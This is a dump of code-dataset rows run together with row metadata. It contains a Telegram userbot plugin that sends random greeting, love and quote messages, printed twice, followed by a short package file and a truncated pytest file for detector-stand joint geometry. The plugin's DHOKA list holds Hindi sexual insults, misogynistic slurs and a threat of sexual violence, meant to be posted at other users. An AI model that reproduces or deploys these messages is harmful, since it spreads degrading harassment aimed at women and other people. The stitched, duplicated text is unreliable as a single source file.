"`Friendship is what makes life worth living. I want to thank you for being such a special friend of mine. Good morning to you!`",
"`A friend like you is pretty hard to come by in life. I must consider myself lucky enough to have you. Good morning. Wish you an amazing day ahead!`",
"`The more you count yourself as blessed, the more blessed you will be. Thank God for this beautiful morning and let friendship and love prevail this morning.`",
"`Wake up and sip a cup of loving friendship. Eat your heart out from a plate of hope. To top it up, a fork full of kindness and love. Enough for a happy good morning!`",
"`It is easy to imagine the world coming to an end. But it is difficult to imagine spending a day without my friends. Good morning.`",
]
@bot.on(admin_cmd(pattern=f"love$", outgoing=True))
@bot.on(sudo_cmd(pattern='love$', allow_sudo=True))
async def love(e):
txt = random.choice(LOVESTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"dhoka$", outgoing=True))
@bot.on(sudo_cmd(pattern='dhoka$', allow_sudo=True))
async def katgya(e):
txt = random.choice(DHOKA)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"metoo$", outgoing=True))
@bot.on(sudo_cmd(pattern='metoo$', allow_sudo=True))
async def metoo(e):
txt = random.choice(METOOSTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdnoon$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnoon$', allow_sudo=True))
async def noon(e):
txt = random.choice(GDNOON)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"chase$", outgoing=True))
@bot.on(sudo_cmd(pattern='chase$', allow_sudo=True))
async def police(e):
txt = random.choice(CHASE_STR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"congo$", outgoing=True))
@bot.on(sudo_cmd(pattern='congo$', allow_sudo=True))
async def Sahih(e):
txt = random.choice(CONGRATULATION)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"qhi$", outgoing=True))
@bot.on(sudo_cmd(pattern='qhi$', allow_sudo=True))
async def hoi(e):
txt = random.choice(eviralOSTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdbye$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdbye$', allow_sudo=True))
async def bhago(e):
txt = random.choice(BYESTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdnyt$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnyt$', allow_sudo=True))
async def night(e):
txt = random.choice(GDNIGHT)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdmng$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdmng$', allow_sudo=True))
async def morning(e):
txt = random.choice(GDMORNING)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern="quote ?(.*)", outgoing=True))
@bot.on(sudo_cmd(pattern="quote ?(.*)", allow_sudo=True))
async def quote_search(event):
if event.fwd_from:
return
catevent = await edit_or_reply(event, "`Processing...`")
input_str = event.pattern_match.group(1)
if not input_str:
api_url = "https://quotes.cwprojects.live/random"
try:
response = requests.get(api_url).json()
except:
response = None
else:
api_url = f"https://quotes.cwprojects.live/search/query={input_str}"
try:
response = random.choice(requests.get(api_url).json())
except:
response = None
if response is not None:
await catevent.edit(f"`{response['text']}`")
else:
await edit_or_reply(catevent, "`Sorry Zero results found`", 5)
CmdHelp("quotes").add_command(
"quote", None, "Sends a random mind-blowing quote"
).add_command("gdmng", None, "Sends a random Good Morning Quote").add_command(
"gdnyt", None, "Sends a random Good Night Quote"
).add_command(
"gdbye", None, "Sends a random Good Byee Quote"
).add_command(
"qhi", None, "Sends a random hello msg"
).add_command(
"congo", None, "Sends a random congratulations quote"
).add_command(
"chase", None, "Sends a random Chase quote"
).add_command(
"gdnoon", None, "Sends a random Good Afternoon quote"
).add_command(
"metoo", None, 'Sends a text saying "Mee too"'
).add_command(
"dhoka", None, "Sends a random Dhoka quote(katt gya bc)"
).add_command(
"love", None, "Sends a random love quote🥰. (A stage before .dhoka)"
).add()
| import random
import requests
from FIREX.utils import admin_cmd, edit_or_reply, sudo_cmd
from userbot.cmdhelp import CmdHelp
LOVESTR = [
"The best and most beautiful things in this world cannot be seen or even heard, but must be felt with the heart.",
"You know you're in love when you can't fall asleep because reality is finally better than your dreams.",
"Love recognizes no barriers. It jumps hurdles, leaps fences, penetrates walls to arrive at its destination full of hope.",
"Being deeply loved by someone gives you strength, while loving someone deeply gives you courage.",
"The real lover is the man who can thrill you by kissing your forehead or smiling into your eyes or just staring into space.",
"I swear I couldn't love you more than I do right now, and yet I know I will tomorrow.",
"When I saw you I fell in love, and you smiled because you knew it.",
"In all the world, there is no heart for me like yours. / In all the world, there is no love for you like mine.",
"To love or have loved, that is enough. Ask nothing further. There is no other pearl to be found in the dark folds of life.",
"If you live to be a hundred, I want to live to be a hundred minus one day, so I never have to live without you.",
"Some love stories aren't epic novels. Some are short stories. But that doesn't make them any less filled with love.",
"As he read, I fell in love the way you fall asleep: slowly, and then all at once.",
"I've never had a moment's doubt. I love you. I believe in you completely. You are my dearest one. My reason for life.",
"Do I love you? My god, if your love were a grain of sand, mine would be a universe of beaches.",
"I am who I am because of you.",
"I just want you to know that you're very special... and the only reason I'm telling you is that I don't know if anyone else ever has.",
"Remember, we're madly in love, so it's all right to kiss me any time you feel like it.",
"I love you. I knew it the minute I met you.",
"I loved her against reason, against promise, against peace, against hope, against happiness, against all discouragement that could be.",
"I love you not because of who you are, but because of who I am when I am with you.",
]
DHOKA = [
"Humne Unse Wafa Ki, Aur Dil Bhi Gya Toot, Wo Bhi Chinaal Nikli, Uski Maa ki Chut.",
"Dabbe Me Dabba, Dabbe Me Cake ..Tu Chutiya Hai Zara Seesha To Dekh.",
"Kaam Se Kaam Rakhoge Toh Naam Hoga, Randi Log Ke Chakkkar Me Padoge to Naam Badnaam Hoga.",
"Usne Kaha- Mah Lyf maH Rule, Maine Kaha Bhag BSDK , Tujhy Paida Karna hi Teri Baap ki Sabse Badi Vul.",
"Humse Ulajhna Mat, BSDK Teri Hasi Mita Dunga, Muh Me Land Daal Ke..Sari Hosiyaari Gand Se Nikal Dunga.",
"Aur Sunau Bhosdiwalo ..Kya Haal Hai?..Tumhare Sakal Se Zayda Toh Tumhare Gand Laal Hai!!",
"Pata Nhi Kya Kashish Hai Tumhare Mohabbat Me,Jab Bhi Tumhe Yaad Karta Hu Mera Land Khada Ho Jata Hai.",
"Konsa Mohabbat Kounsi Story, Gand Faad Dunga Agr Bolne Aayi Sorry!",
"Naam Banta Hai Risk Se, Chutiya Banta Hai IshQ Se.",
"Sun Be, Ab Tujhy Mere Zindegi Me Ane ka Koi Haq Nhi,,Aur Tu 1 Number Ki Randi Hai Isme KOi Saq Nhi.",
"Beta Tu Chugli Karna Chor De , Hum Ungli Karna Chor Dengy.",
]
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
GDNOON = [
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good Afternoon Dear!`",
"`With a deep blue sky over my head and a relaxing wind around me, the only thing I am missing right now is the company of you. I wish you a refreshing afternoon!`",
"`The day has come a halt realizing that I am yet to wish you a great afternoon. My dear, if you thought you were forgotten, you’re so wrong. Good afternoon!`",
"`Good afternoon! May the sweet peace be part of your heart today and always and there is life shining through your sigh. May you have much light and peace.`",
"`With you, every part of a day is beautiful. I live every day to love you more than yesterday. Wishing you an enjoyable afternoon my love!`",
"`This bright afternoon sun always reminds me of how you brighten my life with all the happiness. I miss you a lot this afternoon. Have a good time`!",
"`Nature looks quieter and more beautiful at this time of the day! You really don’t want to miss the beauty of this time! Wishing you a happy afternoon!`",
"`What a wonderful afternoon to finish you day with! I hope you’re having a great time sitting on your balcony, enjoying this afternoon beauty!`",
"`I wish I were with you this time of the day. We hardly have a beautiful afternoon like this nowadays. Wishing you a peaceful afternoon!`",
"`As you prepare yourself to wave goodbye to another wonderful day, I want you to know that, I am thinking of you all the time. Good afternoon!`",
"`This afternoon is here to calm your dog-tired mind after a hectic day. Enjoy the blessings it offers you and be thankful always. Good afternoon!`",
"`The gentle afternoon wind feels like a sweet hug from you. You are in my every thought in this wonderful afternoon. Hope you are enjoying the time!`",
"`Wishing an amazingly good afternoon to the most beautiful soul I have ever met. I hope you are having a good time relaxing and enjoying the beauty of this time!`",
"`Afternoon has come to indicate you, Half of your day’s work is over, Just another half a day to go, Be brisk and keep enjoying your works, Have a happy noon!`",
"`Mornings are for starting a new work, Afternoons are for remembering, Evenings are for refreshing, Nights are for relaxing, So remember people, who are remembering you, Have a happy noon!`",
"`If you feel tired and sleepy you could use a nap, you will see that it will help you recover your energy and feel much better to finish the day. Have a beautiful afternoon!`",
"`Time to remember sweet persons in your life, I know I will be first on the list, Thanks for that, Good afternoon my dear!`",
"`May this afternoon bring a lot of pleasant surprises for you and fills you heart with infinite joy. Wishing you a very warm and love filled afternoon!`",
"`Good, better, best. Never let it rest. Til your good is better and your better is best. “Good Afternoon`”",
"`May this beautiful afternoon fill your heart boundless happiness and gives you new hopes to start yours with. May you have lot of fun! Good afternoon dear!`",
"`As the blazing sun slowly starts making its way to the west, I want you to know that this beautiful afternoon is here to bless your life with success and peace. Good afternoon!`",
"`The deep blue sky of this bright afternoon reminds me of the deepness of your heart and the brightness of your soul. May you have a memorable afternoon!`",
"`Your presence could make this afternoon much more pleasurable for me. Your company is what I cherish all the time. Good afternoon!`",
"`A relaxing afternoon wind and the sweet pleasure of your company can make my day complete. Missing you so badly during this time of the day! Good afternoon!`",
"`Wishing you an afternoon experience so sweet and pleasant that feel thankful to be alive today. May you have the best afternoon of your life today!`",
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good afternoon dear!`",
"`Noon time – it’s time to have a little break, Take time to breathe the warmth of the sun, Who is shining up in between the clouds, Good afternoon!`",
"`You are the cure that I need to take three times a day, in the morning, at the night and in the afternoon. I am missing you a lot right now. Good afternoon!`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`I pray to god that he keeps me close to you so we can enjoy these beautiful afternoons together forever! Wishing you a good time this afternoon!`",
"`You are every bit of special to me just like a relaxing afternoon is special after a toiling noon. Thinking of my special one in this special time of the day!`",
"`May your Good afternoon be light, blessed, enlightened, productive and happy.`",
"`Thinking of you is my most favorite hobby every afternoon. Your love is all I desire in life. Wishing my beloved an amazing afternoon!`",
"`I have tasted things that are so sweet, heard words that are soothing to the soul, but comparing the joy that they both bring, I’ll rather choose to see a smile from your cheeks. You are sweet. I love you.`",
"`How I wish the sun could obey me for a second, to stop its scorching ride on my angel. So sorry it will be hot there. Don’t worry, the evening will soon come. I love you.`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`With you every day is my lucky day. So lucky being your love and don’t know what else to say. Morning night and noon, you make my day.`",
"`Your love is sweeter than what I read in romantic novels and fulfilling more than I see in epic films. I couldn’t have been me, without you. Good afternoon honey, I love you!`",
"`No matter what time of the day it is, No matter what I am doing, No matter what is right and what is wrong, I still remember you like this time, Good Afternoon!`",
"`Things are changing. I see everything turning around for my favor. And the last time I checked, it’s courtesy of your love. 1000 kisses from me to you. I love you dearly and wishing you a very happy noon.`",
"`You are sometimes my greatest weakness, you are sometimes my biggest strength. I do not have a lot of words to say but let you make sure, you make my day, Good Afternoon!`",
"`Every afternoon is to remember the one whom my heart beats for. The one I live and sure can die for. Hope you doing good there my love. Missing your face.`",
"`My love, I hope you are doing well at work and that you remember that I will be waiting for you at home with my arms open to pamper you and give you all my love. I wish you a good afternoon!`",
"`Afternoons like this makes me think about you more. I desire so deeply to be with you in one of these afternoons just to tell you how much I love you. Good afternoon my love!`",
"`My heart craves for your company all the time. A beautiful afternoon like this can be made more enjoyable if you just decide to spend it with me. Good afternoon!`",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"`Get back here!`",
"`Not so fast...`",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"`Jokes on you, I'm everywhere`",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"`Go bother someone else, no-one here cares.`",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
'"Oh, look at me! I\'m so cool, I can run from a bot!" - this person',
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
"eviral has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
"eviral has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
eviralOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"Howdy, howdy ,howdy!",
"hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"hello, sunshine!",
"`Hey, howdy, hi!`",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"`Hey there, freshman!`",
"`I come in peace!`",
"`I come for peace!`",
"Ahoy, matey!",
"`Hi !`",
]
CONGRATULATION = [
"`Congratulations and BRAVO!`",
"`You did it! So proud of you!`",
"`This calls for celebrating! Congratulations!`",
"`I knew it was only a matter of time. Well done!`",
"`Congratulations on your well-deserved success.`",
"`Heartfelt congratulations to you.`",
"`Warmest congratulations on your achievement.`",
"`Congratulations and best wishes for your next adventure!”`",
"`So pleased to see you accomplishing great things.`",
"`Feeling so much joy for you today. What an impressive achievement!`",
]
BYESTR = [
"`Nice talking with you`",
"`I've gotta go!`",
"`I've gotta run!`",
"`I've gotta split`",
"`I'm off!`",
"`Great to see you,bye`",
"`See you soon`",
"`Farewell!`",
]
GDNIGHT = [
"`Good night keep your dreams alive`",
"`Night, night, to a dear friend! May you sleep well!`",
"`May the night fill with stars for you. May counting every one, give you contentment!`",
"`Wishing you comfort, happiness, and a good night’s sleep!`",
"`Now relax. The day is over. You did your best. And tomorrow you’ll do better. Good Night!`",
"`Good night to a friend who is the best! Get your forty winks!`",
"`May your pillow be soft, and your rest be long! Good night, friend!`",
"`Let there be no troubles, dear friend! Have a Good Night!`",
"`Rest soundly tonight, friend!`",
"`Have the best night’s sleep, friend! Sleep well!`",
"`Have a very, good night, friend! You are wonderful!`",
"`Relaxation is in order for you! Good night, friend!`",
"`Good night. May you have sweet dreams tonight.`",
"`Sleep well, dear friend and have sweet dreams.`",
"`As we wait for a brand new day, good night and have beautiful dreams.`",
"`Dear friend, I wish you a night of peace and bliss. Good night.`",
"`Darkness cannot last forever. Keep the hope alive. Good night.`",
"`By hook or crook you shall have sweet dreams tonight. Have a good night, buddy!`",
"`Good night, my friend. I pray that the good Lord watches over you as you sleep. Sweet dreams.`",
"`Good night, friend! May you be filled with tranquility!`",
"`Wishing you a calm night, friend! I hope it is good!`",
"`Wishing you a night where you can recharge for tomorrow!`",
"`Slumber tonight, good friend, and feel well rested, tomorrow!`",
"`Wishing my good friend relief from a hard day’s work! Good Night!`",
"`Good night, friend! May you have silence for sleep!`",
"`Sleep tonight, friend and be well! Know that you have done your very best today, and that you will do your very best, tomorrow!`",
"`Friend, you do not hesitate to get things done! Take tonight to relax and do more, tomorrow!`",
"`Friend, I want to remind you that your strong mind has brought you peace, before. May it do that again, tonight! May you hold acknowledgment of this with you!`",
"`Wishing you a calm, night, friend! Hoping everything winds down to your liking and that the following day meets your standards!`",
"`May the darkness of the night cloak you in a sleep that is sound and good! Dear friend, may this feeling carry you through the next day!`",
"`Friend, may the quietude you experience tonight move you to have many more nights like it! May you find your peace and hold on to it!`",
"`May there be no activity for you tonight, friend! May the rest that you have coming to you arrive swiftly! May the activity that you do tomorrow match your pace and be all of your own making!`",
"`When the day is done, friend, may you know that you have done well! When you sleep tonight, friend, may you view all the you hope for, tomorrow!`",
"`When everything is brought to a standstill, friend, I hope that your thoughts are good, as you drift to sleep! May those thoughts remain with you, during all of your days!`",
"`Every day, you encourage me to do new things, friend! May tonight’s rest bring a new day that overflows with courage and exciting events!`",
]
GDMORNING = [
"`Life is full of uncertainties. But there will always be a sunrise after every sunset. Good morning!`",
"`It doesn’t matter how bad was your yesterday. Today, you are going to make it a good one. Wishing you a good morning!`",
"`If you want to gain health and beauty, you should wake up early. Good morning!`",
"`May this morning offer you new hope for life! May you be happy and enjoy every moment of it. Good morning!`",
"`May the sun shower you with blessings and prosperity in the days ahead. Good morning!`",
"`Every sunrise marks the rise of life over death, hope over despair and happiness over suffering. Wishing you a very enjoyable morning today!`",
"`Wake up and make yourself a part of this beautiful morning. A beautiful world is waiting outside your door. Have an enjoyable time!`",
"`Welcome this beautiful morning with a smile on your face. I hope you’ll have a great day today. Wishing you a very good morning!`",
"`You have been blessed with yet another day. What a wonderful way of welcoming the blessing with such a beautiful morning! Good morning to you!`",
"`Waking up in such a beautiful morning is a guaranty for a day that’s beyond amazing. I hope you’ll make the best of it. Good morning!`",
"`Nothing is more refreshing than a beautiful morning that calms your mind and gives you reasons to smile. Good morning! Wishing you a great day.`",
"`Another day has just started. Welcome the blessings of this beautiful morning. Rise and shine like you always do. Wishing you a wonderful morning!`",
"`Wake up like the sun every morning and light up the world your awesomeness. You have so many great things to achieve today. Good morning!`",
"`A new day has come with so many new opportunities for you. Grab them all and make the best out of your day. Here’s me wishing you a good morning!`",
"`The darkness of night has ended. A new sun is up there to guide you towards a life so bright and blissful. Good morning dear!`",
"`Wake up, have your cup of morning tea and let the morning wind freshen you up like a happiness pill. Wishing you a good morning and a good day ahead!`",
"`Sunrises are the best; enjoy a cup of coffee or tea with yourself because this day is yours, good morning! Have a wonderful day ahead.`",
"`A bad day will always have a good morning, hope all your worries are gone and everything you wish could find a place. Good morning!`",
"`A great end may not be decided but a good creative beginning can be planned and achieved. Good morning, have a productive day!`",
"`Having a sweet morning, a cup of coffee, a day with your loved ones is what sets your “Good Morning” have a nice day!`",
"`Anything can go wrong in the day but the morning has to be beautiful, so I am making sure your morning starts beautiful. Good morning!`",
"`Open your eyes with a smile, pray and thank god that you are waking up to a new beginning. Good morning!`",
"`Morning is not only sunrise but A Beautiful Miracle of God that defeats the darkness and spread light. Good Morning.`",
"`Life never gives you a second chance. So, enjoy every bit of it. Why not start with this beautiful morning. Good Morning!`",
"`If you want to gain health and beauty, you should wake up early. Good Morning!`",
"`Birds are singing sweet melodies and a gentle breeze is blowing through the trees, what a perfect morning to wake you up. Good morning!`",
"`This morning is so relaxing and beautiful that I really don’t want you to miss it in any way. So, wake up dear friend. A hearty good morning to you!`",
"`Mornings come with a blank canvas. Paint it as you like and call it a day. Wake up now and start creating your perfect day. Good morning!`",
"`Every morning brings you new hopes and new opportunities. Don’t miss any one of them while you’re sleeping. Good morning!`",
"`Start your day with solid determination and great attitude. You’re going to have a good day today. Good morning my friend!`",
"`Friendship is what makes life worth living. I want to thank you for being such a special friend of mine. Good morning to you!`",
"`A friend like you is pretty hard to come by in life. I must consider myself lucky enough to have you. Good morning. Wish you an amazing day ahead!`",
"`The more you count yourself as blessed, the more blessed you will be. Thank God for this beautiful morning and let friendship and love prevail this morning.`",
"`Wake up and sip a cup of loving friendship. Eat your heart out from a plate of hope. To top it up, a fork full of kindness and love. Enough for a happy good morning!`",
"`It is easy to imagine the world coming to an end. But it is difficult to imagine spending a day without my friends. Good morning.`",
]
@bot.on(admin_cmd(pattern=f"love$", outgoing=True))
@bot.on(sudo_cmd(pattern='love$', allow_sudo=True))
async def love(e):
txt = random.choice(LOVESTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"dhoka$", outgoing=True))
@bot.on(sudo_cmd(pattern='dhoka$', allow_sudo=True))
async def katgya(e):
txt = random.choice(DHOKA)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"metoo$", outgoing=True))
@bot.on(sudo_cmd(pattern='metoo$', allow_sudo=True))
async def metoo(e):
txt = random.choice(METOOSTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdnoon$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnoon$', allow_sudo=True))
async def noon(e):
txt = random.choice(GDNOON)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"chase$", outgoing=True))
@bot.on(sudo_cmd(pattern='chase$', allow_sudo=True))
async def police(e):
txt = random.choice(CHASE_STR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"congo$", outgoing=True))
@bot.on(sudo_cmd(pattern='congo$', allow_sudo=True))
async def Sahih(e):
txt = random.choice(CONGRATULATION)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"qhi$", outgoing=True))
@bot.on(sudo_cmd(pattern='qhi$', allow_sudo=True))
async def hoi(e):
txt = random.choice(eviralOSTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdbye$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdbye$', allow_sudo=True))
async def bhago(e):
txt = random.choice(BYESTR)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdnyt$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdnyt$', allow_sudo=True))
async def night(e):
txt = random.choice(GDNIGHT)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern=f"gdmng$", outgoing=True))
@bot.on(sudo_cmd(pattern='gdmng$', allow_sudo=True))
async def morning(e):
txt = random.choice(GDMORNING)
await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern="quote ?(.*)", outgoing=True))
@bot.on(sudo_cmd(pattern="quote ?(.*)", allow_sudo=True))
async def quote_search(event):
if event.fwd_from:
return
catevent = await edit_or_reply(event, "`Processing...`")
input_str = event.pattern_match.group(1)
if not input_str:
api_url = "https://quotes.cwprojects.live/random"
try:
response = requests.get(api_url).json()
except:
response = None
else:
api_url = f"https://quotes.cwprojects.live/search/query={input_str}"
try:
response = random.choice(requests.get(api_url).json())
except:
response = None
if response is not None:
await catevent.edit(f"`{response['text']}`")
else:
await edit_or_reply(catevent, "`Sorry Zero results found`", 5)
CmdHelp("quotes").add_command(
"quote", None, "Sends a random mind-blowing quote"
).add_command("gdmng", None, "Sends a random Good Morning Quote").add_command(
"gdnyt", None, "Sends a random Good Night Quote"
).add_command(
"gdbye", None, "Sends a random Good Byee Quote"
).add_command(
"qhi", None, "Sends a random hello msg"
).add_command(
"congo", None, "Sends a random congratulations quote"
).add_command(
"chase", None, "Sends a random Chase quote"
).add_command(
"gdnoon", None, "Sends a random Good Afternoon quote"
).add_command(
"metoo", None, 'Sends a text saying "Mee too"'
).add_command(
"dhoka", None, "Sends a random Dhoka quote(katt gya bc)"
).add_command(
"love", None, "Sends a random love quote🥰. (A stage before .dhoka)"
).add()
| none | 1 | 2.369492 | 2 |
celestial/client/system/__init__.py | ams-tech/celestial | 0 | 13531 | from . import cmdline
| from . import cmdline
| none | 1 | 1.089608 | 1 |
tests/test_joints.py | slaclab/pystand | 0 | 13532 | ############
# Standard #
############
import math
###############
# Third Party #
###############
import ophyd
import pytest
##########
# Module #
##########
from detrot import ConeJoint, AngledJoint, StandPoint, Point
from conftest import PseudoMotor
@pytest.fixture(scope='function')
def pseudo_cone():
angled = ConeJoint(slide = PseudoMotor(5),
lift = PseudoMotor(10),
offset = Point(1,2,3))
return angled
@pytest.fixture(scope='function')
def pseudo_angle():
angled = AngledJoint(slide = PseudoMotor(5),
lift = PseudoMotor(10),
offset = Point(1,2,3))
return angled
def test_cone_joint(pseudo_cone):
#Test Vertical
pseudo_cone.alpha = math.pi/2.
assert pytest.approx(pseudo_cone.joint.x) == 5
assert pytest.approx(pseudo_cone.joint.y) == 10
#Test Horizontal
pseudo_cone.alpha= 0
assert pseudo_cone.joint.x == 15
assert pseudo_cone.joint.y == 0
def test_cone_invert(pseudo_cone):
#Test 45
pseudo_cone.alpha = math.pi/4.
assert pseudo_cone.invert((13.07,9.07))[0] == pytest.approx(5,0.1)
assert pseudo_cone.invert((13.07,9.07))[1] == pytest.approx(10,0.1)
def test_angle_joint(pseudo_angle):
#Test Vertical
pseudo_angle.alpha = math.pi/2.
assert pytest.approx(pseudo_angle.joint.x) == 5
assert pytest.approx(pseudo_angle.joint.y) == 10
assert pytest.approx(pseudo_angle.joint.z) == 0
#Test Horizontal
pseudo_angle.alpha = 0
assert pytest.approx(pseudo_angle.joint.x) == 5
assert pytest.approx(pseudo_angle.joint.y) == 0
assert pytest.approx(pseudo_angle.joint.z) == 10
#Test no-slide
pseudo_angle.slide = None
assert pytest.approx(pseudo_angle.joint.x) == 0
assert pytest.approx(pseudo_angle.joint.y) == 0
assert pytest.approx(pseudo_angle.joint.z) == 10
def test_angle_invert(pseudo_angle):
#Test Vertical
pseudo_angle.alpha = math.pi/2.
assert pseudo_angle.invert((6,12))[0] == pytest.approx(5,0.1)
assert pseudo_angle.invert((6,12))[1] == pytest.approx(10,0.1)
#Test no-slide
pseudo_angle.slide = None
assert pseudo_angle.invert((6,12)) == pytest.approx(10,0.1)
def test_position(pseudo_cone):
pseudo_cone.alpha= 0
assert pseudo_cone.position == (16, 2, 3)
pseudo_cone.alpha = math.pi/2.
assert pseudo_cone.position.x == pytest.approx(6,0.1)
assert pseudo_cone.position.y == 12
assert pseudo_cone.position.z == 3
def test_displacement(pseudo_angle):
assert pseudo_angle.displacement == (5,10)
pseudo_angle.slide = None
assert pseudo_angle.displacement == 10
def test_set_joint(pseudo_angle):
#Vertical
pseudo_angle.alpha = math.pi/2.
pseudo_angle.set_joint((6,12))
assert pseudo_angle.displacement[0] == pytest.approx(5,0.1)
assert pseudo_angle.displacement[1] == pytest.approx(10,0.1)
#Test no-slide
pseudo_angle.slide = None
pseudo_angle.set_joint((6,12))
assert pseudo_angle.displacement == pytest.approx(10,0.1)
def test_model(pseudo_angle, pseudo_cone):
model = AngledJoint.model(pseudo_angle)
assert isinstance(model.slide, ophyd.SoftPositioner)
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_angle.displacement
#Test no slide
pseudo_angle.slide = None
model = AngledJoint.model(pseudo_angle)
assert model.slide == None
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_angle.displacement
#Test cone
model = ConeJoint.model(pseudo_cone)
assert isinstance(model.slide, ophyd.SoftPositioner)
assert isinstance(model.lift, ophyd.SoftPositioner)
assert model.displacement == pseudo_cone.displacement
def test_stop(pseudo_cone):
pseudo_cone.stop()
pseudo_cone.slide.stop_call.method.assert_called_with()
pseudo_cone.lift.stop_call.method.assert_called_with()
def test_cmp():
p1 = PseudoMotor(5)
p2 = PseudoMotor(10)
assert AngledJoint(p1,p2) == AngledJoint(p1, p2)
| ############
# Standard #
############
import math
###############
# Third Party #
###############
import ophyd
import pytest
##########
# Module #
##########
from detrot import ConeJoint, AngledJoint, StandPoint, Point
from conftest import PseudoMotor
@pytest.fixture(scope='function')
def pseudo_cone():
angled = ConeJoint(slide = PseudoMotor(5),
lift = PseudoMotor(10),
offset = Point(1,2,3))
return angled
@pytest.fixture(scope='function')
def pseudo_angle():
angled = AngledJoint(slide = PseudoMotor(5),
lift = PseudoMotor(10),
offset = Point(1,2,3))
return angled
def test_cone_joint(pseudo_cone):
#Test Vertical
pseudo_cone.alpha = math.pi/2.
assert pytest.approx(pseudo_cone.joint.x) == 5
assert pytest.approx(pseudo_cone.joint.y) == 10
#Test Horizontal
pseudo_cone.alpha= 0
assert pseudo_cone.joint.x == 15
assert pseudo_cone.joint.y == 0
def test_cone_invert(pseudo_cone):
#Test 45
pseudo_cone.alpha = math.pi/4.
assert pseudo_cone.invert((13.07,9.07))[0] == pytest.approx(5,0.1)
assert pseudo_cone.invert((13.07,9.07))[1] == pytest.approx(10,0.1)
def test_angle_joint(pseudo_angle):
#Test Vertical
pseudo_angle.alpha = math.pi/2.
assert pytest.approx(pseudo_angle.joint.x) == 5
assert pytest.approx(pseudo_angle.joint.y) == 10
assert pytest.approx(pseudo_angle.joint.z) == 0
#Test Horizontal
pseudo_angle.alpha = 0
assert pytest.approx(pseudo_angle.joint.x) == 5
assert pytest.approx(pseudo_angle.joint.y) == 0
assert pytest.approx(pseudo_angle.joint.z) == 10
#Test no-slide
pseudo_angle.slide = None
assert pytest.approx(pseudo_angle.joint.x) == 0
assert pytest.approx(pseudo_angle.joint.y) == 0
assert pytest.approx(pseudo_angle.joint.z) == 10
def test_angle_invert(pseudo_angle):
#Test Vertical
pseudo_angle.alpha = math.pi/2.
assert pseudo_angle.invert((6,12))[0] == pytest.approx(5,0.1)
assert pseudo_angle.invert((6,12))[1] == pytest.approx(10,0.1)
#Test no-slide
pseudo_angle.slide = None
assert pseudo_angle.invert((6,12)) == pytest.approx(10,0.1)
def test_position(pseudo_cone):
pseudo_cone.alpha= 0
